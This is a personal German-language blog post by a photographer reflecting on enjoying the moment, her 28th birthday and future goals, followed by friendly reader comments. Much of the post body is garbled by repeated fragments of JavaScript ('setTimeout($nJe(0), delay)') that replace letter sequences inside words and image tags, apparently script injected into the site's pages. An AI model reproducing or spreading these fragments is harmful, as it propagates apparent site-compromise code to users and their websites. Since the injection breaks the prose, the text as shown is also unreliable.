Sommer- / Winterpause

Ihr Lieben,

aktuell kann ich aus Kapazitätsgründen keine Hochzeiten oder Shootings annehmen.


Eure,
Olivia

Olivia Di Stefano Photography

Ein paar Gedanken – ein persönlicher Blogeintrag

Heute ist ein guter Tag. Heute fühle ich mich wohl, die Sonne scheint und ich kann hier im Garten sitzen und meinen Gedanken freien Lauf lassen. Endlich. Endlich breche ich aus dem Muster ich muss Dinge erledigen aus und genieße den Augenblick. Die Vögel zwitschern mein Kater liegt nicht weit von mir und sonst nichts. Ab und zu hört man ein Audom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to vorbei fahren, aber das ist ein kleines Übel. Ich glaube ich könnte nie ohne Garten leben. Gartenarbeit hasse ich zwar, aber ins Grüne zu schauen ist für mich Entspannung pur. Solche Momente sind selten geworden. Immer kreisen die Gedanken zu Dingen die man noch erledigen muss, stillhalten und den Moment genießen – dafür bleibt schlichtweg keine Zeit. Umso mehr genieße ich die leichte Brise Wind, welche gerade meinen Körper streift und atme dabei tief ein und aus.

dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tografie_Heidelberg_Fodom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tograf_olivia_di_Stefano_.jpg“ alt=““ width=“900″ height=“600″ />

Ich blicke in den Garten und frage mich innerlich, wie produktiv kann ich sein, wenn ich solche schönen Momente ausblende und immer auf dem Sprung bin? Wie sehr leidet meine Kreativität darunter? Es gab Wochen da habe ich mich ausgelaugt gefühlt. Müde und erschöpft. Ob daran das schlechte Wetter schuld war? Jetzt wo ich mit kurzen Hosen hier sitze und alles so friedlich scheint, fühlt es sich richtig an. Bin ich wirklich ein ich liebe-brauche-vergöttere-und-kann-nicht-leben-ohne-den-Sommer-und-Sonne Mensch?

dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tografie_Heidelberg_Fodom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tograf_olivia_di_Stefano_.jpg“ alt=““ width=“900″ height=“674″ />

Diese Woche habe ich so viel wie möglich draußen gemacht. Mittagessen, oh wie wunderbar, raus an die frische Luft! Doch hat mein Kopf nicht abgeschalten und war schon wieder auf die Aufgaben fixiert, die ich auf einer Liste geschrieben hatte. To-Do Listen so sehr ich sie liebe, so sehr erschöpfend kann es sein, wenn man immer wieder mit Erstaunen feststellt, dass man die gleichen Dinge erledigt und ebenso viele Dinge wieder einmal vergessen hat. Liegt das an einer falschen Organisationsplanung? Die nächste Woche sollte ich ganz gezielt meinen Arbeitsalltag analysieren. Irgendwo muss es ein Loch geben, das Zeit frisst.

Nicht weit von mir beobachte ich einen Vogel, er kommt mir immer näher auf der Suche nach Nahrung. Seelig hüpft er umher. Ob das die Mutter einer kleinen Kükenbdom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ande ist? Da entdecke ich meinen Kater auf der Lauer. Gott sei Dank sind Vögel schlau genug und wittern Gefahr. Wittern wir Menschen auch, wenn wir Gefahr laufen uns zu überschätzen und an kleinen Dingen scheitern oder muss man scheitern um wieder aufzustehen und festzustellen, dass man doch mit großen Füßen seinen Zielen näher kommt? Was ist, wenn man aber gar nicht weiß, welche Ziele man verfolgt?

Letzte Woche war mein 28. Geburtstag. Da stellt man sich audom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tomatisch die Frage, was man in den nächsten Jahren erreichen möchte. Bei längerer Überlegung breitet sich ein großes Fragezeichen aus. Gefolgt von einem Bild mit mir und meiner Kamera. Ich hatte noch nie einen Plan dem ich folgte, vielleicht fällt es mir daher schwer ein großes Ziel zu sehen – Ich habe kleine Schritte gemacht und erst spät festgestellt, dass meine Wünsche und Ziele sich von den meisten meiner Freunde abheben. Während dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andere zielstrebig ihren Lebensplan folgten, stdom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}and ich noch verloren herum und wusste nicht wo genau ich hin gehöre. Und dann kam der Abschnitt mit meiner ersten digitalen Spiegelreflexkamera.

dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tografie_Heidelberg_Fodom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tograf_olivia_di_Stefano_.jpg“ alt=““ width=“900″ height=“600″ />

Bei allem was ich bisher gemacht habe, durfte ich dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolle und inspirierende Menschen kennenlernen. Ich habe richtige Entscheidungen getroffen, obwohl der Weg nicht immer klar war oder ist. Ich wollte keine Station in meinem Leben missen. Es gibt so viele glückliche Momente, aber auch viele schmerzliche Erfahrungen, die mich hier her geführt haben. Ohne einen festen Plan zu haben, weiß ich dennoch, dass das hier richtig ist. Es fühlt sich richtig an.

dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tografie_Heidelberg_Fodom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tograf_olivia_di_Stefano_.jpg“ alt=““ width=“900″ height=“600″ />

Für die Zukunft habe ich mir vorgenommen mich fodom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tografisch stetig weiterzuentwickeln und viel mehr freien Projekten Raum zu geben. Reisen und was von der Welt sehen und kennenlernen – auch ein Punkt, den ich für mich auf meine Liste gesetzt habe. Ich möchte viele Tage am Strdom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}and verbringen. Eine Hochzeit im Ausldom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}and fodom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tografieren. Und vieles vieles mehr.

dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tografie_Heidelberg_Fodom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tograf_olivia_di_Stefano_.jpg“ alt=““ width=“900″ height=“674″ />dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tografie_Heidelberg_Fodom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tograf_olivia_di_Stefano_.jpg“ alt=““ width=“900″ height=“600″ />dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tografie_Heidelberg_Fodom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tograf_olivia_di_Stefano_.jpg“ alt=““ width=“900″ height=“674″ />

Wenn man das große Ganze betrachtet, habe ich unschätzbares Glück mit meinem Leben. Ich bin froh, dass die Dinge oft gut laufen und bin aber auch für das Scheitern offen. Es ist schön wie es ist. Und auch das plätschern des Teiches meines Nachbarn erfüllt mich gerade mit lieblicher Freude.

Ab jetzt möchte ich viel öfter den Augenblick genießen und Ruhe in mein Herz lassen.

Es ist ein dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolles Leben, perfekt sicher nicht, aber echt. Wo es mich noch hinträgt und was mich in Zukunft erwartet, das werde ich noch früh genug sehen. Im hier und jetzt bin ich dankbar für alles was ich habe und ein kleines bisschen Sdom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolz breitet sich in mir aus.

dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tografie_Heidelberg_Fodom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tograf_olivia_di_Stefano_.jpg“ alt=““ width=“900″ height=“674″ />

7 Kommentare
Schreibe einen Kommentar...

DANKE für euren Besuch und die lieben Worte. Gekennzeichnete Felder bitte ausfüllen. *

  • Lisa Kiewel12/08/2014 - 22:00

    Wunderbar geschrieben! :)AntwortenCancel

  • Steffi R.06/06/2014 - 11:01

    Was für ein wunderschöner Beitrag meine Liebe… Ich kann dem eigentlich gar nichts mehr hinzufügen weil du mir komplett aus der Seele mit deinem Beitrag sprichst. Gerade in letzter Zeit habe ich viele Augenblicke genossen, die Ruhe und eben auch mal an mich gedacht und nicht immer nur daran was ich noch alles machen muss und wie präsent ich vielleicht sein muss. Gerade wenn es um das Thema Fotografie geht. Es tut einfach gut mehr auf sich und auf die wichtigen Dinge des Lebens zu achten. Zeit mit der Familie zu verbringen und eben auch mal die Arbeit liegen zu lassen. Das muss man lernen und fällt sicher nicht immer leicht, aber ich habe es in letzter Zeit geschafft und das macht mich sehr glücklich. Es fühlt sich einfach gut an. Danke für diesen tollen Beitrag und die wunderschönen Fotos. Ich liebe das S/W – Bild von dir. Fühl dich gedrücktAntwortenCancel

  • Denise Dreßler23/05/2014 - 20:25

    Wunderschöne Gedanken, von denen ich gerne mehr in deinem Blog lesen würde. Ich mag diese Art des Schreibens selbst auch sehr gerne, weil man einfach mal seine Seele dabei baumeln lassen kann.AntwortenCancel

  • Josi Freitag22/05/2014 - 18:48

    Super schön! Deine Einstellung ist genau richtig Olivia. Ich wünsche dir wundervolle Erfahrungen und ein offenes Herz
    AntwortenCancel

  • Monique22/05/2014 - 17:10

    „Ab jetzt möchte ich viel öfter den Augenblick genießen und Ruhe in mein Herz lassen.“

    schön geschrieben ♥ im Gesamten!AntwortenCancel

    • Olivia Di Stefano23/05/2014 - 07:39

      Dankeschön liebe Monique für die lieben Worte.

      Danke auch dir Susen, dann sitzen wir ja im gleichen Boot :),

      Vielen Dank auch an Josi für diesen schönen Satz!

      liebe Grüße, OliviaAntwortenCancel

  • Susen Mairif22/05/2014 - 13:51

    Wunderschön geschrieben, als könntest du in meine Gedanken lesen <3 AntwortenCancel

Menu